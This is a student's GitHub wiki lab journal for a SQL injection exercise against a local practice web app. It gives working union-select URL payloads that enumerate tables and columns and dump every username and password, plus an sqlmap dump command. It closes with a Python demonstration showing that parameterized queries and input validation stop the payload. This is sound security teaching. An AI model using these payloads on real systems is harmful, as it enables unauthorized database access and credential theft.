Week 9: Lab 9.1 SQLi - FlameSpyro/Tech-Journal GitHub Wiki

Week 9: Lab 9.1 SQLi

Prep

  • To start, we needed to enable and start the mysqld service, then run the secure installation script
sudo systemctl enable mysqld 
sudo systemctl start mysqld
sudo mysql_secure_installation
  • FYI: root has no password at this point
Switch to unix_socket authentication [Y/n] n
Change the root password? [Y/n] Y
Remove anonymous users? [Y/n] y
Disallow root login remotely? [Y/n] y
Remove test database and access to it? [Y/n] y
Reload privilege tables now? [Y/n] y
  • Now edit the db-creds.inc under sql-connections and add the root password
nano sql-connections/db-creds.inc

Lesson 1

  • Boot up the server
php -S 127.0.0.1:8090 -t .
  • Click Setup/reset Database for labs

Deliverable 1

127.0.0.1:8090/Less-1/?id=1

Deliverable 2

127.0.0.1:8090/Less-1/?id=1' order by 4%20--+

Deliverable 3

127.0.0.1:8090/Less-1/?id=-1' union select 1,user(),database()%20--+

Deliverable 4

127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

Deliverable 5

127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+

Deliverable 6

127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

Deliverable 7

sqlmap -u http://127.0.0.1:8090/Less-1/?id=1 -T users --level 2 --risk 2 --dump
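
Why the Deliverable 6 payload returns every username and password, and what stops it, as an added example that is not part of the original lab or the lab project's code. It assumes the lesson builds its query by pasting id between single quotes (which the payloads above imply), uses sqlite3 in place of MySQL so it runs offline, and the function names and sample rows are constructed for illustration.

```python
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    # Constructed sample data standing in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "alice-pw"), (2, "bob", "bob-pw")])
    return db

def lookup_concatenated(db, raw_id):
    # Assumed shape of the lesson's query: the id is pasted between single quotes.
    # A quote inside raw_id closes the string literal; the rest is parsed as SQL,
    # and the trailing "-- " comments out the original "' LIMIT 0,1".
    sql = "SELECT * FROM users WHERE id='" + raw_id + "' LIMIT 0,1"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, raw_id):
    # The value is bound separately from the statement text, so it is only ever
    # compared as data and can never change the structure of the query.
    return db.execute("SELECT * FROM users WHERE id = ? LIMIT 0,1", (raw_id,)).fetchall()

def lookup_validated(db, raw_id):
    # Defense in depth: id is numeric in this schema, so reject anything else
    # before it reaches the database at all.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    return lookup_parameterized(db, raw_id)

# The id value from Deliverable 6, decoded the way a web server would ('+' -> space).
PAYLOAD = unquote_plus(
    "-1' union select 1,group_concat(username),group_concat(password) from users --+")

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concatenated, lookup_parameterized, lookup_validated):
        print(fn.__name__, "id=1     ->", fn(db, "1"))
        print(fn.__name__, "payload  ->", fn(db, PAYLOAD))
```

Only the concatenated lookup returns the joined username and password columns for the payload; the bound and validated lookups return no rows for it while still serving id=1 normally.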